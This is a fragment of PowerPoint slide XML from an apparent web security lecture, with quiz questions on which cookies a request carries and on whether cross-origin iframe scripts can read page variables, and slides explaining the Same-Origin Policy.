          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CCCDA7C-E87E-57F1-39E9-3BB041FB691C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="489385" y="4943968"/>
            <a:ext cx="3421642" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>www.images.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> / viewed=cat.jpg</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B56DE1E7-87C7-4099-C3C9-307FDAB50DB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6303078" y="5814466"/>
            <a:ext cx="5109472" cy="474651"/>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peech Bubble: Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0096249F-8C3B-AE64-05E8-98683AD0D4EF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4429751" y="2783302"/>
            <a:ext cx="6615043" cy="2345332"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -62302"/>
              <a:gd name="adj2" fmla="val 21131"/>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285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>If the user browses to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>http://example.com/fun_images.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>, which cookies are included in the HTTP request?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>What if the user browses to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>http://www.images.com/lots_more_cats.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="427219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16" presetClass="exit" presetSubtype="21" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="barn(inVertical)">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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="3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animBg="1"/>
      <p:bldP spid="19" grpId="1"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Mixing Origins</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="234820" y="1690688"/>
            <a:ext cx="5985588" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;body&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>	&lt;p&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>This is my page.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/p&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>	&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>var</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>password =</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘s3cr3t’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>	&lt;iframe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>goog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>‘http://google.com’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/iframe&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill>
              <a:latin typeface="Menlo"/>
              <a:ea typeface="Menlo"/>
              <a:cs typeface="Menlo"/>
              <a:sym typeface="Menlo"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="241093">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:latin typeface="Menlo"/>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6270168" y="1690688"/>
            <a:ext cx="5674567" cy="4292082"/>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dirty="0"/>
              <a:t>This is my page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangular Callout 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="415212" y="3857928"/>
            <a:ext cx="5475514" cy="761988"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 7462"/>
              <a:gd name="adj2" fmla="val -144403"/>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t>Can JavaScript from google.com read the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> variable?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangular Callout 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="320350" y="5341717"/>
            <a:ext cx="5665237" cy="1132816"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 62290"/>
              <a:gd name="adj2" fmla="val -5784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t>Can JavaScript in the main context do the following: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>(‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0" err="1"/>
              <a:t>goog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>’).cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{836C7F1C-F090-E106-5016-5EFAECDB83DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6427755" y="2828707"/>
            <a:ext cx="5349033" cy="1838581"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BED0761E-AC29-452A-3B26-C1BAA1DD7D0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9730333" y="3758165"/>
            <a:ext cx="698015" cy="216384"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="2829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001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3B26-C289-47B1-9EF5-73DB69DA115C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA9C008-C63C-48CB-961D-ED841CE792F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Basis of all classical web security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Same-Origin Policy (SOP) states that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from one origin cannot access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from another origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP is the basis of classic web security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some exceptions to this policy (unfortunately)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SOP has been relaxed over time to make </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>controlled</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> sharing easier</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the case of cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Domains are the origins</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>the objects</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="254040766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EA11-81F0-4CE0-BAFA-870378025B3F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Same Origin Policy</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ACA4E2D8-021E-4D52-831A-0E71FE948A83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Origin = &lt;protocol, hostname, port&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Same-Origin Policy (SOP) states that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>subjects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from one origin cannot access </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objects</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from another origin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This applies to cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This applies to JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>JS from origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> cannot access objects from origin </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D’</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., the iframe example</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, JS included into </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> can access all objects in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>D</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>E.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘https://code.jquery.com/jquery-2.1.3.min.js’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="179454495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0B08E7-FB4C-CA4D-B145-0FBEE0D628B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
